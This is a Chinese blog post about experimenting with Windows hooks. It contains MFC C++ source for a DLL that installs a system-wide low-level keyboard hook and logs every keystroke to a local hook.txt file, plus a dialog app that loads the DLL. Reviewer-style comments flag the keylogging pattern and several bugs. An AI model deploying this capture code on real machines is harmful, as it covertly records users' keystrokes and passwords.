接着《About ShutDown of Windows(三)》折腾着，没多大收获。
Create 了一个 MFC 的DLL
// MFC application object of the hook DLL. Hook() below reads AfxGetApp()->m_hInstance,
// which is meant to resolve to this object (whether it does when Hook() is called from the
// EXE depends on the current MFC module state — see the note on Hook()).
CHookDLLApp theApp;
// Handle returned by SetWindowsHookEx in Hook() and passed to CallNextHookEx by MyKeyHook.
// Nothing on this page ever passes it to UnhookWindowsHookEx.
HHOOK g_Hook = NULL;
// Low-level keyboard hook procedure, installed by Hook() with SetWindowsHookEx(WH_KEYBOARD_LL).
// Windows calls it for each keyboard event on the desktop. Per the LowLevelKeyboardProc docs a
// WH_KEYBOARD_LL procedure runs in the context of the thread that installed it, not inside the
// process that receives the key — which is consistent with the observation below that only
// HookTest.exe shows HookDLL.dll as a loaded module.
// Defender's view: SetWindowsHookEx(WH_KEYBOARD_LL) plus appending every vkCode to a file is the
// textbook user-mode keystroke-capture pattern; the on-disk artefact here is "hook.txt", opened
// with a relative path, i.e. in the hooking process's current directory.
//   code   - hook code. The docs require that for code < 0 the procedure pass the call straight
//            to CallNextHookEx without further processing; this function does not check it and
//            dereferences lParam unconditionally.
//   wParam - key message id (WM_KEYDOWN / WM_KEYUP / WM_SYSKEYDOWN / WM_SYSKEYUP).
//   lParam - pointer to a KBDLLHOOKSTRUCT describing the key.
// Returns whatever CallNextHookEx returns, so the event is never swallowed.
LRESULT CALLBACK MyKeyHook(int code, WPARAM wParam, LPARAM lParam)
{
#if (_WIN32_WINNT < 0x0400)
/*
* Structure used by WH_KEYBOARD_LL
* (declared locally here, presumably for SDK headers that predate the type)
*/
typedef struct tagKBDLLHOOKSTRUCT {
DWORD vkCode;
DWORD scanCode;
DWORD flags;
DWORD time;
DWORD dwExtraInfo;
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;
#endif
PKBDLLHOOKSTRUCT kbDLLHOOK = (PKBDLLHOOKSTRUCT)lParam;
// NOTE(review): info stays NULL for any wParam other than the four handled below, and the
// "%s" in the Format call would then be given a NULL pointer.
const char *info = NULL;
if (wParam == WM_KEYDOWN)
info = "key down";
else if (wParam == WM_KEYUP)
info = "key up";
else if (wParam == WM_SYSKEYDOWN)
info = "sys key down";
else if (wParam == WM_SYSKEYUP)
info = "sys key up";
// NOTE(review): the fopen result is not checked; if "hook.txt" cannot be opened (for example a
// read-only current directory) fwrite/fclose below dereference NULL inside the hook procedure.
FILE* f = fopen("hook.txt", "a+");
CString strLog;
// vkCode is written twice: once as hex and once again as a character via %c.
strLog.Format("%s - vkCode [%04x], [%c] scanCode [%04x]\n", info, kbDLLHOOK->vkCode, kbDLLHOOK->vkCode, kbDLLHOOK->scanCode);
fwrite(strLog, 1, strLog.GetLength(), f);
fclose(f);
// always call next hook
return CallNextHookEx(g_Hook, code, wParam, lParam);
}
// Exported entry point (see HookDLL.def): installs MyKeyHook as a WH_KEYBOARD_LL hook.
// dwThreadId = 0 makes the hook apply to all threads on the calling desktop.
// hMod is taken from AfxGetApp()->m_hInstance. NOTE(review): this is an exported function of a
// regular MFC DLL with no AFX_MANAGE_STATE(AfxGetStaticModuleState()) at the top, so when it is
// called from an MFC EXE, AfxGetApp() may return the EXE's app object rather than this DLL's
// theApp — confirm which module handle actually reaches SetWindowsHookEx.
// The returned handle is stored in g_Hook for CallNextHookEx. Nothing on this page calls
// UnhookWindowsHookEx, so the hook persists until the process exits. On failure only a message
// box is shown; the function returns void, so the caller cannot detect the failure.
void Hook()
{
// TODO: Add extra initialization here
// 13 is the platform SDK's value for WH_KEYBOARD_LL, supplied here for headers that lack it.
#ifndef WH_KEYBOARD_LL
#define WH_KEYBOARD_LL 13
#endif
g_Hook = SetWindowsHookEx(WH_KEYBOARD_LL, MyKeyHook, AfxGetApp()->m_hInstance, 0);
if( g_Hook == NULL )
AfxMessageBox("Failed to Set Hook");
}
; HookDLL.def : Declares the module parameters for the DLL.
LIBRARY "HookDLL"
DESCRIPTION 'HookDLL Windows Dynamic Link Library'
EXPORTS
; Explicit exports can go here
; Hook (ordinal 1) installs the WH_KEYBOARD_LL hook; it is the only export, so the DLL offers
; no exported way to call UnhookWindowsHookEx on the handle it keeps in g_Hook.
; Exporting by name lets the EXE resolve it with GetProcAddress(Module, "Hook").
Hook @1
Create 了一个MFC的工程
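// Dialog initialisation: standard MFC wizard setup (system-menu "About" entry, icons), then
// loads the hook DLL and calls its exported Hook() to install the WH_KEYBOARD_LL hook.
// The DLL path is built from GetModuleFileName(NULL, ...) with the extension stripped, so
// LoadLibrary gets an absolute path and the DLL search order is not consulted; LoadLibrary
// appends ".dll" to a name without an extension, so the module loaded is "<exe basename>.dll".
// NOTE(review): the .def names the DLL "HookDLL" while the EXE is called HookTest.exe in the
// text — confirm the two names actually match on disk.
// Each step that can fail (path lookup, LoadLibrary, GetProcAddress) now reports via
// AfxMessageBox and leaves the dialog running without a hook instead of calling through NULL.
// The module is deliberately never freed: MyKeyHook lives in it and the hook stays installed.
// Returns TRUE so the framework keeps the default focus (no control is focused explicitly).
BOOL CHookTestDlg::OnInitDialog()
{
    CDialog::OnInitDialog();

    // Add "About" menu item to system menu.
    // IDM_ABOUTBOX must be in the system command range.
    ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX < 0xF000);
    CMenu* pSysMenu = GetSystemMenu(FALSE);
    if (pSysMenu != NULL)
    {
        CString strAboutMenu;
        strAboutMenu.LoadString(IDS_ABOUTBOX);
        if (!strAboutMenu.IsEmpty())
        {
            pSysMenu->AppendMenu(MF_SEPARATOR);
            pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }

    // Set the icon for this dialog. The framework does this automatically
    // when the application's main window is not a dialog
    SetIcon(m_hIcon, TRUE);  // Set big icon
    SetIcon(m_hIcon, FALSE); // Set small icon

    // Full path of this executable; a zero return means the lookup failed.
    TCHAR szPath[MAX_PATH] = {0};
    if (GetModuleFileName(NULL, szPath, MAX_PATH) == 0)
    {
        AfxMessageBox("Failed to get module path");
        return TRUE;
    }
    // Drop ".exe"; LoadLibrary will append ".dll" to the extension-less name.
    PathRenameExtension(szPath, _T(""));

    HMODULE hHookDll = LoadLibrary(szPath);
    if (hHookDll == NULL)
    {
        AfxMessageBox("Failed to load hook DLL");
        return TRUE;
    }

    // "Hook" is exported by name in HookDLL.def; it takes no arguments and returns nothing.
    typedef void (*TYPE_pfnHook)();
    TYPE_pfnHook pfnHook = (TYPE_pfnHook)GetProcAddress(hHookDll, "Hook");
    if (pfnHook == NULL)
    {
        AfxMessageBox("Hook export not found in DLL");
        return TRUE;
    }
    pfnHook();

    return TRUE; // return TRUE unless you set the focus to a control
}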
时间太紧,没做一些异常判断处理
HOOK成功了,用 SysCheck 工具一看, 只看到了 HookTest.exe 里面加载了一个HookDLL.dll
采用 injecteddll 工具也没有看到所谓的“注入”DLL
是否“注入”成功,不得所知
所谓的“注入”又该怎么看到的呢?明天再解决它。